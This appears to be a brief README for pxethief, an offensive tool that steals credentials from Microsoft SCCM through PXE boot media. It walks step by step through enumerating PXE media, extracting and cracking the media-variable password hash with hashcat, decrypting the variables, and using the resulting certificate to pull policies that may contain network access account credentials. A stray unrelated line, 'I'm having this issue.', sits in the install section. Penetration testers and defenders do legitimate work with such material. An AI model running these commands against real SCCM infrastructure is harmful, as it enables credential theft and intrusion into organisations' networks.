# pxethief

pxethief helps you get creds out of SCCM.

# Install

Get python install from python.org - 64bit installer

pip install -r requirements.txt

I'm having this issue.

# General enumeration - automatically download encrypted media file using DHCP PXE

pxethief.py 1

# Target a specific MECM DP

pxethief.py 2 1.2.3.4

# Identify hash of the password that was used to encrypt the variables

pxethief.py 5 boot.var

Note: the boot.var is a file you might find in the \\SCCMSERVER\REMINST\SMSTEMP folder

# Crack the extracted hash

I found it easier to use the hashcat-6.2.6-SCCM version of hashcat, and then use this syntax:

hashcat-6.2.6-SCCM.exe -m 19850 hash.txt bigbadwordlist.txt

# Decrypt and retrieve contents of the media variables file (if cracking was successful)

pxethief.py 3 somevariablesfile.var YOUR-CRACKED-PASSWORD-GOES-HERE

At this point you should be able to get a certificate that will be used to request SCCM policies and task sequences which may have the NAA or other creds.